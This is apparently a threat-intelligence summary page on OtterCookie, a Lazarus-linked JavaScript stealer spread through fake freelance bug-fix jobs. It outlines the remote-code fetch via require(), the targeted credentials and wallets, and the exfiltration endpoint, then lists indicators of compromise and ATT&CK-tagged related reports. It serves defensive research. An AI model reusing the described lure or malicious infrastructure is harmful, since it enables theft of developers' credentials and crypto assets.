OtterCookie: Analysis of New Lazarus Group Malware

2025-06-03 Any Run

https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

Thumbnail for OtterCookie: Analysis of New Lazarus Group Malware

OtterCookie is described as a Lazarus-linked JavaScript stealer delivered through the Contagious Interview or DevPopper social engineering pattern against tech, financial, and cryptocurrency professionals. In the observed case, a LinkedIn freelance bug-fix pretext led the target to a clean-looking Bitbucket Node.js project whose intentional startup failure fetched and executed code from chainlink-api-v3[.]cloud via a require() call. The malware targets browser credentials, macOS keychains, password-manager and crypto-wallet data including Solana and Exodus, then stages collected data for exfiltration to 144.172.101.45 over port 1224 at /uploads. The payload also attempts to install a portable Python runtime and execute InvisibleFerret, linking the intrusion chain to earlier DPRK malware such as Beavertail and InvisibleFerret. The campaign matters because it shows Lazarus hiding execution inside normal developer troubleshooting workflows rather than relying on obviously malicious dependencies.

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN chainlink-api-v3.cloud 2025-04-11 2026-02-19
IPv4 144.172.101.45 2025-06-03 2026-02-03
IPv4 135.181.123.177 2025-04-11 2025-10-16
HASH 56e15ef3b5e5f169fc063f8d3e88288e 2025-04-11 2025-07-30
URL http://chainlink-api-v3.cloud/a… 2025-04-11 2025-07-30
HASH ec234419fc512baded05f7b29fefbf1… 2025-04-11 2025-06-03
HASH aa0d64c39680027d56a32ffd4ceb787… 2025-04-11 2025-06-03
HASH 071aff6941dc388516d8ca0215b757f… 2025-04-11 2025-06-03
HASH 486f305bdd09a3ef6636e92c6a9e016… 2025-04-11 2025-06-03
URL http://chainlink-api-v3.cloud/a… 2025-04-11 2025-06-03

Related Actors

Related Reports

2024-07-19 • 53% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Lazarus, T1082, T1071
2025-08-13 • 50% Match
#Lazarus #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1584.004 #T1005 #T1070.004 #T1587.001 #T1041 #T1560 #T1608.001 #T1071.001 #T1046 #T1083 #T1056.001 #T1204.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1566.003 #T1124 #T1057 #T1059.005 #T1583.006 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1583.001 #T1059.001 #T1036.005 #T1132.001 #T1001.003 #T1585.001 #T1497.001 #T1105 #T1553.002 #T1620 #T1574.002 #T1562.001 #T1027.002 #T1489 #T1078 #T1008 #T1571 #T1491.001 #T1218 #T1220 #T1203 #T1189 #T1049 #T1564.001 #T1098 #T1016 #T1074.001 #T1588.002 #T1562.004 #T1591 #T1218.011 #T1583.004 #T1036.004 #T1588.003 #T1218.010 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1048.003 #T1134.002 #T1027.007 #T1021.001 #T1106 #T1090.001 #T1573 #T1070 #T1047 #T1574.013 #T1561.001 #T1036.003 #T1529 #T1055.001 #T1614.001 #T1010 #T1021.002 #T1033 #T1543.003 #T1485 #T1090.002 #T1542.003 #T1560.002 #T1012 #T1110 #T1547.009 #T1110.003 #T1534 #T1588.004 #T1104 #T1591.004 #T1561.002 #T1608.002 #T1202 #T1221 #T1557.001 #T1087.002 #T1560.003 #T1070.003 #T1021.004
Shares tags: Lazarus, T1082, T1571
« Back